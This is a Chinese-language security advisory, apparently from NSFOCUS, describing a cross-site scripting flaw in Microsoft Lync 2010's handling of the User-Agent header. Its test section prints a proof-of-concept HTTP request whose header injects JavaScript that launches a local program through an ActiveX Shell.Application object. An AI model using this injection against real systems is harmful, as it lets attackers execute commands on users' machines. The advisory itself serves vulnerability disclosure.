安全研究

安全漏洞
Microsoft Lync 'User-Agent'跨站脚本执行漏洞

发布日期:2013-01-11
更新日期:2013-01-15

受影响系统:
Microsoft Lync 2010 4.0.7577.0
描述:
BUGTRAQ  ID: 57300

Microsoft Lync 新一代企业整合沟通平台(前身为 Communications Server),提供了一种全新的、直观的用户体验,跨越 PC、Web、手机等其他移动设备,将不同的沟通方式集成到一个平台之中。

Microsoft Lync没有正确过滤meet.domainame.com的“User-Agent Header”,通过将JS插入到上诉参数和栈命令,攻击者可利用此漏洞在应用的上下文中执行任意命令。

<*来源:Christopher Emerson (christopher.emerson@whiteoaksecurity com)
  
  链接:http://seclists.org/fulldisclosure/2013/Jan/68
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

GET /JW926520 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/xaml+xml,
application/vnd.ms-xpsdocument, application/x-ms-xbap,
application/x-ms-application, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR
3.5.30729)&quot;;var oShell = new ActiveXObject(&quot;Shell.Application&quot;);var
commandtoRun =
&quot;C:\\Windows\\notepad.exe&quot;;oShell.ShellExecute(commandtoRun,&quot;&quot;,&quot;&quot;,&quot;open&quot;,&quot;1&quot;);-&quot;
Host: meet.domainname.com
Connection: Keep-Alive
Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=example

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

浏览次数:4411
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障